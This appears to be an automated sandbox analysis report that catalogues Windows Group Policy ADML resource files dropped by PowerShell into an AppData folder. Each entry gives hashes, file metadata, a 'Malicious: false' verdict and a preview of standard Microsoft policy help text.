Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Rpc">Remote Procedure Call</string>.. <string id="RpcEEInfoOff">Off</string>.. <string id="RpcEEInfoOffWithExc">Off with Exceptions</string>.. <string id="RpcEEInfoOn">On</string>.. <string id="RpcEEInfoOnWithExc">On with Exceptions</string>.. <string id="RpcEnableAuthEpResolution">Enable RPC Endpoint Mapper Client Authentication</string>.. <string id="RpcEnableAuthEpResolution_Help">This policy setting controls whether RPC clients authenticate with the Endpoint Mapper Service when the

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\RacWmiProv.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1378
Entropy (8bit):	4.961792727852399
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3FNPKJAzSIveqsUA0j01oSxz1kFV:cgeD5x8gmYAkFVgeMFV
MD5:	B8793F540E47EE449A0369A0569CFB8A
SHA1:	3701D0618E2079A6EFDAD7748C21B6B236CD2070
SHA-256:	4BEFE402E1D8BAF094346887C509331398720109298EEB4DD947879DFE0A9216
SHA-512:	59C4192172AC1BF0278659B1876B3E71ECDD0FE4E2E6B0EC33796C75566F85C0BD1AD6FF5D3BC57382532D65CA3914982369F199781B1DC6E84C1B69CA517D32
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Reliability Analysis Component</displayName>.. <description>Reliability Analysis Component</description>.. <resources>.. <stringTable>.. <string id="RAC">Windows Reliability Analysis</string>.. <string id="ConfigureRacWmi">Configure Reliability WMI Providers</string>.. <string id="ConfigureRacWmi_help">This policy setting allows the Windows Management Instrumentation (WMI) providers Win32_ReliabilityStabilitymetrics and Win32_ReliabilityRecords to provide data to Reliability Monitor in the Action Center control panel, and to respond to WMI requests.....If you enable or do not configure this policy setting, the listed providers will resp

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Radar.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (563), with CRLF line terminators
Category:	dropped
Size (bytes):	2714
Entropy (8bit):	4.801755208450146
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKbFnok+9MKFLOL5dEyIsaVZ57O0BsYu+P4XEgV:LeD5pmnFnok+9RL+M5jVZ8CsuPeV
MD5:	64AFB930E79CDCDF1D967B37180DEC5C
SHA1:	AA45CC6BCA49EF263EC3880FFE65F1C5D936CC70
SHA-256:	8C710DC3983ED5962C5F7D40C3390C660AE7597CEA71F2BF8FF68B6EFC594CB7
SHA-512:	BF40F01F07FB8674902D50A9C7B6C3636714B6C3E5FFC1D045689B46A63024379CB1FE45092FF98912E265433FD4A8970B4CCF539F1AA56831E2283231D55AC7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Windows Resource Exhaustion Detection and Resolution</string>.. <string id="WdiScenarioExecutionPolicy">Configure Scenario Execution Level</string>.. <string id="WdiScenarioExecutionPolicyExplain">Determines the execution level for Windows Resource Exhaustion Detection and Resolution.....If you enable this policy setting, you must select an execution level from the dropdown menu. If you select problem detection and troubleshooting only, the Diagnostic Policy Service (DPS) will detect

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ReAgent.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (483), with CRLF line terminators
Category:	dropped
Size (bytes):	1817
Entropy (8bit):	4.807685062167235
Encrypted:	false
SSDEEP:	48:cgeD5x8gmclqzPa520pns19F9K0SppRPRDdamFV:LeD5pmnvI3R9FV
MD5:	74A0325268266B2CDE0E3F5F1597F203
SHA1:	088E690A896920238445D6605ACBE4F40498742F
SHA-256:	11AB21A9F9176CBC644DBDC5020FA4791086234FB126A5F0885315EFD299BB35
SHA-512:	D79952DFB16CF46EF6D91DC4031CDAD7F7D060E92E16E18CECA3CA5B69F017C895FD54655F05F6CEE08C027CC3981BDA16F798726C69A39C95FF923D763B72F0
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Recovery</displayName>.. <description>Recovery</description>.. <resources>.. <stringTable>.. <string id="WinRE">Recovery</string>.. <string id="ConfigureWinRESetup">Allow restore of system to default state</string>.. <string id="ConfigureWinRESetup_help"> Requirements: Windows 7.. Description: This policy setting controls whether users can access the options in Recovery (in Control Panel) to restore the computer to the original state or from a user-created system image..... If you enable or do not configure this policy setting, the items "Use a system image you created earlier to recover your computer" and "Reinstall Windows" (

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Reliability.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5310
Entropy (8bit):	4.781992069178365
Encrypted:	false
SSDEEP:	96:LeD5pmAydEk3E7mEvPexos3w33I3tcGBQ4pdV:E8EkCmE3exoiO32tTBQy
MD5:	0B7DB39B4E35B6787C19C79280664C11
SHA1:	870AA05E92B4B0FACEC8EC4E7D8F5C428748A5A4
SHA-256:	3FC94A050B5B845BF0D21AB6D0718A5BC0FD292624A6AA4E7D8E06317DE34863
SHA-512:	6E9A356BCE00B25A998A0B63BF6C0B29521DE43DD155712A025311518DC212384C4599B48D403E3E1DD2580E3B5F1D6688930D7441A66488C6A7870EF3233F87
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="EE_EnablePersistentTimeStamp">Enable Persistent Time Stamp</string>.. <string id="EE_EnablePersistentTimeStamp_Help">This policy setting allows the system to detect the time of unexpected shutdowns by writing the current time to disk on a schedule controlled by the Timestamp Interval.....If you enable this policy setting, you are able to specify how often the Persistent System Timestamp is refreshed and subsequently written to the disk. You can specify the Timestamp Interval in seconds.....If you disable this

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\RemoteAssistance.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (455), with CRLF line terminators
Category:	dropped
Size (bytes):	10373
Entropy (8bit):	4.861749081876546
Encrypted:	false
SSDEEP:	192:E2YJPhavu9rf+gZnyy8uI30F3GF3QRcb4vervzv6lQ4:Nfu9rf+CZ8uI30F3GF3QRcbSebjqQ4
MD5:	F239E9C6B37ABE7AEE14C64FCD64D86A
SHA1:	D703C2A53723A2F933DE2456E706154A29194247
SHA-256:	428CCC88349680A1684A33176FED4E4B8BC544EC7B29DCD71CB17BFFE274D16F
SHA-512:	8221ABD08D82C27C4AAE3136E8E085C56BF8FF3D4059583F744C5837C61AAD0832D9AE5E84EF77780890A01684EB4F5D5CA33A7E35986435F771FDB67F66D11F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="RA_Logging">Turn on session logging</string>.. <string id="RA_Logging_Help">This policy setting allows you to turn logging on or off. Log files are located in the user's Documents folder under Remote Assistance.....If you enable this policy setting, log files are generated.....If you disable this policy setting, log files are not generated.....If you do not configure this setting, application-based settings are used.</string>.. <string id="RA_Optimize_Bandwidth">Turn on bandwidth optimization</string>..

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\RemovableStorage.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (302), with CRLF line terminators
Category:	dropped
Size (bytes):	13642
Entropy (8bit):	4.756771021239847
Encrypted:	false
SSDEEP:	192:EnzGj8hc8ROewd8BWwfZ6P0OuI3CDzGvnt7fdXV/gBLtDNGaUgmGaUTGaUFmGaU6:NtjIvGaUBGaUTGaUEGaUUGaUW
MD5:	3C7C9203B770747E42F16415384ACA91
SHA1:	577E03EBA471F120DB1A1D96648E18E215C57982
SHA-256:	61727D2632E0E816A562C6489E5732206A94D3F3581D35042F72FC03A7ECD3D0
SHA-512:	7C3F140959497EC753935942A4CB063BA3D431D1F5C4A6FA16BEBD065DE5280C9C0AC34E2A938E413CC7B68A78D2C33BE73DE58F74B1BD71A4A8DBDD12ABF080
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AccessRights_RebootTime">Set time (in seconds) to force reboot</string>.. <string id="AccessRights_RebootTime_Help">This policy setting configures the amount of time (in seconds) that the operating system waits to reboot in order to enforce a change in access rights to removable storage devices.....If you enable this policy setting, you can set the number of seconds you want the system to wait until a reboot.....If you disable or do not configure this setting, the operating system does not force a reboot.....N

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Scripts.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (331), with CRLF line terminators
Category:	dropped
Size (bytes):	12538
Entropy (8bit):	4.768527840947223
Encrypted:	false
SSDEEP:	192:E4w/xBxQzr/8RRROAHPKc16VcDuJxR1Vi3ia67NitbK0pft+pw7TUlyUAGSJ:wnRRPgHkS9A9D1P
MD5:	6B1C987D0C322DD0DD627EC2020F90AC
SHA1:	C25254DCB050E342AB84633F084B9ABC06EF9239
SHA-256:	EBC840298B0A1FB37F1DB1DF288FC5FAEA981B2F8AE4BE9E0E07D11A1E9E0FB5
SHA-512:	915A3DB4C3C0572BE46009BA976FFB606FD304B5908207F288C06DFA6A2281153304E7FF368E446BB8CE5217E0DB4FF849DD2119904007057D85ADEBB9B75325
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MaxGPOScriptWaitPolicy">Specify maximum wait time for Group Policy scripts</string>.. <string id="MaxGPOScriptWaitPolicy_Help">This policy setting determines how long the system waits for scripts applied by Group Policy to run. ....This setting limits the total time allowed for all logon, logoff, startup, and shutdown scripts applied by Group Policy to finish running. If the scripts have not finished running when the specified time expires, the system stops script processing and records an error event.....If y

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Securitycenter.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (622), with CRLF line terminators
Category:	dropped
Size (bytes):	2466
Entropy (8bit):	4.781426635707619
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKBtxHxPUNbhQaB6+J5KaeKUYF1vKUYox2P1C9L5GkMo/2VcSurcFV:LeD5pmdtxHxG64MYfYo8NQL8IGrccFV
MD5:	BB7C4CF9B3DDFEFAE5FF4C38B5026EB3
SHA1:	157C536B83CB87B194C8BF8018A965EF72DC314B
SHA-256:	F49034EF8C96F7E5A19AFB7873AFB1A3F289630390E36C163B12FD2DDC15637A
SHA-512:	DE9E2E1824A0B9B03AFC476090D361DD5808C6D0B6C8EB70C7DFC590D8B222C78D062CAB2580E8F74F243CD713EB268BFC72BE232698F15CA269EE007F6B41DE
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SecurityCenter">Security Center</string>.. <string id="SecurityCenter_SecurityCenterInDomain">Turn on Security Center (Domain PCs only)</string>.. <string id="SecurityCenter_SecurityCenterInDomain_Help">This policy setting specifies whether Security Center is turned on or off for computers that are joined to an Active Directory domain. When Security Center is turned on, it monitors essential security settings and notifies the user when the computer might be at risk. The Security Center Control Panel categ

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Sensors.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2056
Entropy (8bit):	4.6874178503699655
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKcgWEhQnwgbc+ijJzo/DQxCGgbxCEinEqcN8gUOZFV:LeD5pmkRLRSo/k0V0EvN4CFV
MD5:	7CAFF134D90FB9D9BFFD1931A3B7A077
SHA1:	6C1305F61CF2978F73F3C8DF3FB7639BC3761863
SHA-256:	B102166CF6A473DCE4ADC301156086D0EBA710EFFFA1C4A569EA480994A7F5B4
SHA-512:	2D7427C5572797903A6539A872B9AF3062F23BDF24E3004EC61388D321ABBDCF1D063DB00F5703BDC708AA1AE1B5FCF3262F961C3E9CFBC44BFDE8C001A4583D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableSensors">Turn off sensors</string>.. <string id="DisableSensors_Explain">.. This policy setting turns off the sensor feature for this computer..... If you enable this policy setting, the sensor feature is turned off, and all programs on this computer cannot use the sensor feature..... If you disable or do not configure this policy setting, all programs on this computer can use the sensor feature... </string>.. <string id="DisableLocation">Turn off location</string>..

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ServerManager.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (387), with CRLF line terminators
Category:	dropped
Size (bytes):	4955
Entropy (8bit):	4.805565480068189
Encrypted:	false
SSDEEP:	96:LeD5pmHhpF4FGEkPDY1o1NucOc3EfqYz0LYS0zYS0jfBQ3V:E2hpi4rPE1o1NudbrUMqfBQF
MD5:	65C390CEDEDFD130518B61FA1235250A
SHA1:	6A55E7AC36FE463A16AF0BE1F7F8B5C1848C0D97
SHA-256:	E47082B33ACA0FB727E6486ECA05ED0F7E309923D214DF7D6D1E9E1BB6B58A93
SHA-512:	FAC7D91F8DAE73E2719FE7D9E8BDAE71A4B3DD4375943DA8F0B9992E4554E0E95A503BB5F5EEAC6E6475209F9051B343D2928D028A3355EA58F987DD76ADD03D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SUPPORTED_WindowsServer2008OrWindowsServer2008R2Only">Windows Server 2008 and Windows Server 2008 R2 operating systems only</string>.. <string id="DoNotLaunchServerManager">Do not display Server Manager automatically at logon</string>.. <string id="DoNotLaunchServerManagerHelp">This policy setting allows you to turn off the automatic display of Server Manager at logon.....If you enable this policy setting, Server Manager is not displayed automatically when a user logs on to the server.....If you disable t

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Servicing.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (408), with CRLF line terminators
Category:	dropped
Size (bytes):	2386
Entropy (8bit):	4.892231615075483
Encrypted:	false
SSDEEP:	48:cs+D5p8lF9YGTBdVhcNZPhcNspL8K5pWNLcrdYAkWQ/tgiwavEARV:P+D5iF9YGTnVhcNhhcNspL8KiNFBWQ/P
MD5:	C16E4D55B366521038B07E5B2EAA4D1A
SHA1:	C8FA7021E315736D6ED23ACA59D8B0CC3460FDD2
SHA-256:	0FB29A9479B51033FDE4838E9E61D1D382B173EF4F43C00799EF97940F0E498C
SHA-512:	9DC2BFAAE5885EE74E4AB8C7E9D0B6557550F8E6315199F23006F202AA234244CA1802D2D289F95E3213CA577DBD14D7D086CED34BDE2349C127CB31141E2512
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2011 Microsoft Corporation -->..<policyDefinitionResources revision="1.0" schemaVersion="1.0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Servicing Policies</displayName>.. <description>Windows Servicing Policies</description>.. <resources>.. <stringTable>.. <string id="CloudFulfillmentGPO">Specify settings for optional component installation and component repair</string>.. <string id="CloudFulfillmentGPOExplanation">..This policy setting specifies the network locations that will be used for the repair of operating system corruption and for enabling optional features that have had their payload files removed.....If you enable this policy setting and specify the new location, the files in that location will be used to repair operating system corruption and for enabling

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\SettingSync.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	9740
Entropy (8bit):	4.723278539465857
Encrypted:	false
SSDEEP:	96:PD5pmpC5ZTUe/5edwuTysvjk9yGfUqWxOV:ftHUwueIjkkGfnWw
MD5:	A46525DCC0BBEFF3717004AA7D5E686B
SHA1:	85429467F34FFB172D7E404E60542C50090C6AFE
SHA-256:	044A3C384EC4E46E9EE6AA4BF4D28F3027A758DE7A9163324FE80EE466E935E5
SHA-512:	551C90AD33D7ECBE6E0D45B1FF22ED092C239EFC63189D7D0E0FF1147E82C3694ECE958DF4DF5A89F87E4CE966284D9317CEE93D6F38B76152ED26A3D2DC54A0
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2012 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. General -->.. <string id="SettingSyncCategory">Sync your settings</string>.... Main policy -->.. <string id="DisableSettingSync">Do not sync</string>.. <string id="DisableSettingSync_Help">Prevent syncing to and from this PC. This turns off and disables the "sync your settings" switch on the "sync your settings" page in PC Settings.....If you enable this policy setting, "sync your settings" will be turned off, and none of the "sync your setting" groups will be synced on this PC.....Use the option

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Setup.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2060
Entropy (8bit):	4.847450101986129
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61ybvkTvKvkTlE6OmYyfbTebTlCa/Yi7R0ryMOVjoV:cgeD5x8gm8fKnxRRxYEbQRj/Yi7S0oV
MD5:	9940A876376DFACA4C22AEB49D5E98D1
SHA1:	4092EC36B7F64EB2D076D11F04AFBB38C95A9AEB
SHA-256:	F0AF5022E574F037FEFF288B1944788E08E9F1C3CC29E2968022B05EE8A12D71
SHA-512:	DE5BF65874ABDF5AF96EA22C5D97170AE5B3312B39A2FB3C19F1E33D0A7AC71F2633510E2CE1C87794FE818CD50DA4FB2D328E69C1E0005D9C8D86B96A88C1D8
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ServicePackSourcePath">Specify Windows Service Pack installation file location</string>.. <string id="ServicePackSourcePath_Help">Specifies an alternate location for Windows Service Pack installation files.....If you enable this policy setting, enter the fully qualified path to the new location in the "Windows Service Pack Setup file path" box.....If you disable or do not configure this policy setting, the Windows Service Pack Setup source path will be the location used during the last time Windows Service Pac

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\SharedFolders.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1850
Entropy (8bit):	4.859149246040625
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKgJxujBDrfS1Z/yqqqYu5BV5ocfS1Z/MFV:LeD5pmCeKV4JcKVMFV
MD5:	B512AC9CA34BC2605D206FA9D22778F1
SHA1:	21E31C62BA3B2E963A2A78B9490270D87E14F082
SHA-256:	3649D182A6D570C693D564E11B80127960E3F34BD98C2DABC5E5A1F640B7EACF
SHA-512:	2F726D9A4E067AC354A7C6E5EC36EC5973CD04731E4A14DF3DE30061447A077F38F8B4752112E0DB0BA3E1DACCB6A0C98F148F4FB00FCBEE07B6D6A7206020F0
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PublishDfsRoots">Allow DFS roots to be published</string>.. <string id="PublishDfsRoots_Help">This policy setting determines whether the user can publish DFS roots in Active Directory Domain Services (AD DS).....If you enable or do not configure this policy setting, users can use the "Publish in Active Directory" option to publish DFS roots as shared folders in AD DS .....If you disable this policy setting, users cannot publish DFS roots in AD DS and the "Publish in Active Directory" option is disabled. Note:

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Sharing.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (372), with CRLF line terminators
Category:	dropped
Size (bytes):	2463
Entropy (8bit):	4.766622027240466
Encrypted:	false
SSDEEP:	48:cgeD5x8gm8fKMQ44nWQqxjgwrGOnLbvE4juaM8oFV:LeD5pmdpMGOnN6aM8oFV
MD5:	F76CBCDF77EAC5FEF366F9F9D45F5E76
SHA1:	89F54964A2B4E1DE63448AADFCC678470886DDAF
SHA-256:	56D6E0E7FD98836C698D345735B4F7633DF49C455500C41B20E7B5D6FDF40AB3
SHA-512:	D86BB5E1DA555D6F09FEA4E3C930AE560E777F64B0C38A225201CC401869A82A0A05A5C3E874310C1F4C0BA33F131B607CBA7DAB8BE61AC247F44CCB080401D2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NoInplaceSharing">Prevent users from sharing files within their profile.</string>.. <string id="NoInplaceSharing_Help">This policy setting specifies whether users can share files within their profile. By default users are allowed to share files within their profile to other users on their network after an administrator opts in the computer. An administrator can opt in the computer by using the sharing wizard to share a file within their profile.....If you enable this policy setting, users cannot share files w

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Shell-CommandPrompt-RegEditTools.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (461), with CRLF line terminators
Category:	dropped
Size (bytes):	5239
Entropy (8bit):	4.777406183575808
Encrypted:	false
SSDEEP:	96:LeD5pmrH1U680U30fNS57tc/Ja80+fgT9lsc/osa80+fVxV:EYU6xU3RtckQ0zscCQVT
MD5:	3925D35054AB425A8F3690C2FA33BDFC
SHA1:	A2DFC384B4F8351B40B9406A94ADEFB1B85F9C7B
SHA-256:	BEC7CF7EC0CDFD01BB8677C20C887988A642742F136C0437D49A67F218087842
SHA-512:	AE7CABBE1C4E7618E787F9D3BDB621CB32E99F5802114A20BCF6ADA2E7B52F7EE12556E8023B38142FF42EA580624DAB40D988B23AEE4BB4BB9E2A8905B175D1
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableCMD">Prevent access to the command prompt</string>.. <string id="DisableCMD_Help">This policy setting prevents users from running the interactive command prompt, Cmd.exe. This policy setting also determines whether batch files (.cmd and .bat) can run on the computer.....If you enable this policy setting and the user tries to open a command window, the system displays a message explaining that a setting prevents the action.....If you disable this policy setting or do not configure it, users can run Cmd.

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\ShellWelcomeCenter.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1034
Entropy (8bit):	4.934703334666594
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3Fbef61y8Cnid3PRM5LDa3IQWFV:cgeD5x8gm8fK4IPRMNe3IQWFV
MD5:	E1C3A48A813C8E8D7F076966FFF1782F
SHA1:	E678B2457A0B3D7FA37C25899823E1DCBF335552
SHA-256:	778A48685463098ECBAB0E95EC4BA4CC299704453A10B790404D636C78495A6F
SHA-512:	E7B2002E5ABEDBC1C2E877143F6296A060FF2BE18CDF9743119F068CBA422A4D4B502E7E69DCABA5D1A5BBB20E42D9EA978479A3A996040E4F9CC5413F1E1F5E
Malicious:	false
